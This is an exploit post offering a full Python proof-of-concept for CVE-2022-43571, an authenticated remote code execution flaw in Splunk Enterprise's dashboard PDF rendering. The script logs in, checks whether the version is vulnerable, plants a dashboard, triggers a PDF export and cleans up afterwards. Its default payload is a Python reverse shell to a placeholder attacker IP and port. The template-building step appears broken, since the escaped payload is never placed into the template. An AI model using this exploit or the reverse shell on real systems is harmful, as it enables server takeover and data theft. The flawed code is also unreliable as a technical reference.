============================================================================================================================================= | # Title : Splunk Enterprise 8.2.9 / 9.0.2 Authenticated Remote Code Execution via PDF Dashboard Rendering | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://www.splunk.com | ============================================================================================================================================= [+] Summary : CVE‑2022‑43571 is a critical authenticated Remote Code Execution (RCE) vulnerability affecting Splunk Enterprise. The flaw resides in the SimpleXML dashboard PDF generation process, where insufficient input sanitization allows a privileged authenticated user to inject malicious content into dashboard configurations. When the affected dashboard is exported to PDF, the injected content may be executed in the context of the Splunk server, potentially leading to full system compromise. Successful exploitation requires valid Splunk credentials but can result in arbitrary command execution, data exposure, and lateral movement. Splunk has released patches, and immediate upgrading to a fixed version is strongly recommended. [+] Usage : pip install requests packaging # For testing only : python poc.py -u https://splunk.example.com:8000 --username admin --password password --check-only # To run the exploit : python poc.py -u https://splunk.example.com:8000 --username admin --password password [+] POC : #!/usr/bin/env python3 import requests import random import string import re import sys import time import urllib.parse from typing import Optional, Dict, Tuple import base64 import json class SplunkExploit: def __init__(self, target_url: str, username: str, password: str, use_inline_query: bool = False): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.use_inline_query = use_inline_query self.session = requests.Session() self.session.verify = False self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' }) self.cookie = None self.target_app = None self.dash_name = None def splunk_login(self) -> Optional[str]: """Authenticate to Splunk and return session cookie.""" login_url = f"{self.target_url}/en-US/account/login" resp = self.session.get(login_url) if resp.status_code != 200: print(f"[-] Failed to access login page: {resp.status_code}") return None cval_match = re.search(r'name="cval"\s+value="([^"]+)"', resp.text) if not cval_match: print("[-] Could not find cval token") return None cval = cval_match.group(1) login_data = { 'cval': cval, 'username': self.username, 'password': self.password, 'set_has_logged_in': 'false' } resp = self.session.post( f"{self.target_url}/en-US/account/login", data=login_data, allow_redirects=False ) if resp.status_code in [302, 200]: if 'splunkweb_csrf_token' in self.session.cookies: self.cookie = f"splunkweb_csrf_token={self.session.cookies['splunkweb_csrf_token']}" print(f"[+] Successfully logged in as {self.username}") return self.cookie print("[-] Login failed") return None def check_splunk_version(self) -> Tuple[bool, str]: """Check if Splunk version is vulnerable.""" if not self.cookie: self.cookie = self.splunk_login() if not self.cookie: return False, "Login failed" version_url = f"{self.target_url}/en-US/app/launcher/home" headers = {'Cookie': self.cookie} resp = self.session.get(version_url, headers=headers) if resp.status_code != 200: return False, f"Failed to access home page: {resp.status_code}" version_match = re.search(r'Splunk®\s+([\d\.]+)', resp.text) if version_match: version_str = version_match.group(1) print(f"[+] Found Splunk version: {version_str}") from packaging import version as pkg_version try: v = pkg_version.parse(version_str) if (pkg_version.parse("8.1.0") <= v <= pkg_version.parse("8.1.11")) or \ (pkg_version.parse("8.2.0") <= v <= pkg_version.parse("8.2.8")) or \ (pkg_version.parse("9.0.0") <= v <= pkg_version.parse("9.0.1")): return True, f"Vulnerable version found: {version_str}" else: return False, f"Non-vulnerable version: {version_str}" except Exception as e: print(f"[-] Error parsing version: {e}") return False, "Could not parse version" return False, "Could not determine version" def gen_inline_splunk_query(self) -> str: """Generate an inline Splunk query.""" row_id_name = self.random_string(8, 16) arr_field = self.random_string(8, 16) rand_count = random.randint(100, 500) step = random.randint(2, 15) col_count = random.randint(3, 10) column_names = [self.random_string(8, 16) for _ in range(col_count)] delimiter = random.choice([';', '|', ':', '#', '!']) names_string = delimiter.join(column_names) query = f""" | makeresults count={rand_count} | streamstats count as {row_id_name} | eval _time = now() - ({row_id_name} * {step}), {arr_field} = split("{names_string}", "{delimiter}"), sourcetype = mvindex({arr_field}, {row_id_name} % {col_count}) | chart sparkline count by sourcetype """ return query.strip() def get_system_index_splunk_query(self) -> str: """Get a query using system indexes.""" rand_tail = random.randint(100, 200) index = random.choice(['_internal', '_audit', '_introspection']) return f"index={index} | tail {rand_tail} | chart sparkline count by sourcetype" def random_string(self, min_len: int = 8, max_len: int = 16) -> str: """Generate random alphanumeric string.""" length = random.randint(min_len, max_len) return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) def get_random_app(self, enabled: bool = True) -> str: """Get a random app name (simplified).""" common_apps = ['search', 'launcher', 'splunk_monitoring_console'] return random.choice(common_apps) def create_dashboard(self, app: str, dash_name: str, template: str) -> bool: """Create a dashboard with malicious template.""" create_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views" headers = { 'Cookie': self.cookie, 'Content-Type': 'application/x-www-form-urlencoded', 'X-Splunk-Form-Key': self.get_form_key() } data = { 'name': dash_name, 'eai:data': template } resp = self.session.post(create_url, headers=headers, data=data) if resp.status_code in [200, 201]: print(f"[+] Dashboard '{dash_name}' created successfully") return True print(f"[-] Failed to create dashboard: {resp.status_code}") print(f"Response: {resp.text[:500]}") return False def get_form_key(self) -> str: """Extract form key from Splunk page.""" home_url = f"{self.target_url}/en-US/app/launcher/home" headers = {'Cookie': self.cookie} resp = self.session.get(home_url, headers=headers) if resp.status_code == 200: match = re.search(r'formKey\s*:\s*"([^"]+)"', resp.text) if match: return match.group(1) return self.random_string(32, 32) def export_dashboard(self, app: str, dash_name: str) -> bool: """Trigger PDF export of dashboard to execute payload.""" export_url = f"{self.target_url}/en-US/api/pdfgen/render" headers = { 'Cookie': self.cookie, 'Content-Type': 'application/json', 'X-Splunk-Form-Key': self.get_form_key() } payload = { 'serverURL': f"{self.target_url}/en-US", 'app': app, 'dashboard': dash_name, 'width': 1000, 'height': 800 } try: resp = self.session.post( export_url, headers=headers, json=payload, timeout=30 ) print("[+] PDF export triggered (payload execution attempted)") return True except Exception as e: print(f"[*] Export request completed (expected if payload executes): {e}") return True def delete_dashboard(self, app: str, dash_name: str) -> bool: """Delete the created dashboard.""" delete_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views/{dash_name}" headers = { 'Cookie': self.cookie, 'X-Splunk-Form-Key': self.get_form_key() } resp = self.session.delete(delete_url, headers=headers) if resp.status_code in [200, 204]: print(f"[+] Dashboard '{dash_name}' deleted") return True return False def generate_malicious_template(self, payload: str) -> str: """Generate malicious dashboard template with payload.""" if self.use_inline_query: splunk_query = self.gen_inline_splunk_query() else: splunk_query = self.get_system_index_splunk_query() style_param = random.choice(['lineColor', 'fillColor']) escaped_payload = urllib.parse.quote(payload) template = f""" {splunk_query}
""" lines = template.split('\n') return '\n'.join(line.strip() for line in lines if line.strip()) def exploit(self, reverse_shell_payload: str = None) -> bool: """Execute the full exploit chain.""" print("[*] Starting Splunk RCE exploit (CVE-2022-43571)") print("[*] Attempting to login...") if not self.splunk_login(): return False print("[*] Checking Splunk version...") is_vuln, msg = self.check_splunk_version() print(f"[*] {msg}") if not is_vuln: print("[-] Target does not appear to be vulnerable") return False if not reverse_shell_payload: # Example Python reverse shell payload reverse_shell_payload = """__import__('os').system('python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"YOUR_IP\\\",YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"')""" print(f"[*] Using payload: {reverse_shell_payload[:50]}...") print("[*] Generating malicious dashboard template...") template = self.generate_malicious_template(reverse_shell_payload) self.target_app = self.get_random_app() self.dash_name = self.random_string(8, 16) print(f"[*] Target app: {self.target_app}") print(f"[*] Dashboard name: {self.dash_name}") print("[*] Creating dashboard...") if not self.create_dashboard(self.target_app, self.dash_name, template): return False print("[*] Triggering PDF export to execute payload...") if not self.export_dashboard(self.target_app, self.dash_name): print("[-] Failed to trigger export") time.sleep(5) print("[*] Attempting to cleanup...") self.delete_dashboard(self.target_app, self.dash_name) print("[+] Exploit completed") return True def cleanup(self): """Cleanup created resources.""" if self.target_app and self.dash_name: self.delete_dashboard(self.target_app, self.dash_name) def main(): """Main function for standalone execution.""" import argparse parser = argparse.ArgumentParser(description='Splunk RCE Exploit (CVE-2022-43571)') parser.add_argument('-u', '--url', required=True, help='Splunk base URL (e.g., https://splunk.example.com:8000)') parser.add_argument('--username', default='admin', help='Splunk username (default: admin)') parser.add_argument('--password', required=True, help='Splunk password') parser.add_argument('--inline-query', action='store_true', help='Use inline Splunk query') parser.add_argument('--check-only', action='store_true', help='Only check if target is vulnerable') args = parser.parse_args() import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) exploit = SplunkExploit( target_url=args.url, username=args.username, password=args.password, use_inline_query=args.inline_query ) try: if args.check_only: is_vuln, msg = exploit.check_splunk_version() print(f"\n{'='*50}") print(f"Check Results: {msg}") print(f"{'='*50}") sys.exit(0 if is_vuln else 1) else: success = exploit.exploit() sys.exit(0 if success else 1) except KeyboardInterrupt: print("\n[*] Exploit interrupted by user") exploit.cleanup() sys.exit(1) except Exception as e: print(f"\n[-] Error: {e}") exploit.cleanup() sys.exit(1) if __name__ == "__main__": main() Greetings to :============================================================ jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*| ==========================================================================